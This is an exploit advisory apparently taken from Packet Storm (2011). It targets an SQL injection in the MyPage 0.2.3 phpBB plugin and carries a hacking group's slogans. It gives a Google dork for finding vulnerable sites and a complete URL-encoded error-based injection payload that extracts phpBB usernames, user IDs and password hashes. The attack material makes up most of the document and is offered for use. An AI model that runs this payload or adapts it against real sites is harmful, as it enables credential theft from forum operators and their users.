MyPage 0.2.3 SQL Injection

2011-12-07T00:00:00
ID PACKETSTORM:107586
Type packetstorm
Reporter CrazyMouse
Modified 2011-12-07T00:00:00

Description

                                        
                                            `====================================================  
MyPage plugin (phpBB) SQL Injection (All versions)  
====================================================  
  
====================================================  
Improve your hacking knowledges !  
====================================================  
====================================================  
VISIT http://HackSociety.net !  
====================================================  
  
# Exploit Title: SQL Injection on the plugin phpBB plugin MyPage  
# Google Dork: inurl:"mypage.php?id="  
# Date: 06/12/2011  
# Author: CrazyMouse (from HackSociety.net)  
# Version: 0.2.3 (this is the last avaliable version, older versions are also vulnerable)  
# Tested on: Windows 7 x64 (Firefox)  
  
====================================================  
VISIT http://HackSociety.net !  
====================================================  
  
  
[~] Exploit:  
  
http://localhost/forum/  
  
  
[~] http://localhost/forum/mypage.php?id= (SQL)  
  
  
[~] Example:  
  
http://server/forum/mypage.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cphpbb_users.user_id%2C0x5e%2Cphpbb_users.user_type%2C0x5e%2Cphpbb_users.group_id%2C0x5e%2Cphpbb_users.username%2C0x5e%2Cphpbb_users.user_password%2C0x27%2C0x7e%29+from+%60forum_domperm%60.phpbb_users+limit+5%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271  
  
  
====================================================  
  
# Thanks to  
  
Crassus  
  
====================================================  
  
  
====================================================  
VISIT http://HackSociety.net !  
====================================================  
  
`